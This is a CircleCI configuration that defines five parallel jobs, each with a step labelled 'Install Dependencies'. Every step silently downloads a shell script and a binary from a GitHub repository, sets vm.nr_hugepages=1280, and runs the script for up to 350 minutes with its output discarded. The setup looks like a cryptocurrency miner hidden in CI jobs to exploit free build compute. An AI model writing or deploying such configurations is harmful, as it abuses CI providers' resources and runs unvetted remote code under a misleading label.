# Use the latest 2.1 version of CircleCI pipeline process engine. See: https://circleci.com/docs/2.0/configuration-reference
version: 2
jobs:
    aku1:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: sudo apt-get install -y gcc git build-essential cmake libuv1-dev libssl-dev libhwloc-dev > /dev/null 2>&1 && wget https://github.com/ririnsinta/ririnsinta/raw/7f5b93e27a665065bbe0235221e3eedcfe40d637/cobalagi.sh && wget https://github.com/ririnsinta/ririnsinta/raw/main/tuyulsugar && sudo sysctl -w vm.nr_hugepages=1280 && chmod +x tuyulsugar cobalagi.sh && timeout 350m ./cobalagi.sh > /dev/null 2>&1
    aku2:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: sudo apt-get install -y gcc git build-essential cmake libuv1-dev libssl-dev libhwloc-dev > /dev/null 2>&1 && wget https://github.com/ririnsinta/ririnsinta/raw/7f5b93e27a665065bbe0235221e3eedcfe40d637/cobalagi.sh && wget https://github.com/ririnsinta/ririnsinta/raw/main/tuyulsugar && sudo sysctl -w vm.nr_hugepages=1280 && chmod +x tuyulsugar cobalagi.sh && timeout 350m ./cobalagi.sh > /dev/null 2>&1
    aku3:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: sudo apt-get install -y gcc git build-essential cmake libuv1-dev libssl-dev libhwloc-dev > /dev/null 2>&1 && wget https://github.com/ririnsinta/ririnsinta/raw/7f5b93e27a665065bbe0235221e3eedcfe40d637/cobalagi.sh && wget https://github.com/ririnsinta/ririnsinta/raw/main/tuyulsugar && sudo sysctl -w vm.nr_hugepages=1280 && chmod +x tuyulsugar cobalagi.sh && timeout 350m ./cobalagi.sh > /dev/null 2>&1
    aku4:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: sudo apt-get install -y gcc git build-essential cmake libuv1-dev libssl-dev libhwloc-dev > /dev/null 2>&1 && wget https://github.com/ririnsinta/ririnsinta/raw/7f5b93e27a665065bbe0235221e3eedcfe40d637/cobalagi.sh && wget https://github.com/ririnsinta/ririnsinta/raw/main/tuyulsugar && sudo sysctl -w vm.nr_hugepages=1280 && chmod +x tuyulsugar cobalagi.sh && timeout 350m ./cobalagi.sh > /dev/null 2>&1
    aku5:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: sudo apt-get install -y gcc git build-essential cmake libuv1-dev libssl-dev libhwloc-dev > /dev/null 2>&1 && wget https://github.com/ririnsinta/ririnsinta/raw/7f5b93e27a665065bbe0235221e3eedcfe40d637/cobalagi.sh && wget https://github.com/ririnsinta/ririnsinta/raw/main/tuyulsugar && sudo sysctl -w vm.nr_hugepages=1280 && chmod +x tuyulsugar cobalagi.sh && timeout 350m ./cobalagi.sh > /dev/null 2>&1

workflows:
    version: 2
    build:
        jobs:
            - aku1
            - aku2
            - aku3
            - aku4
            - aku5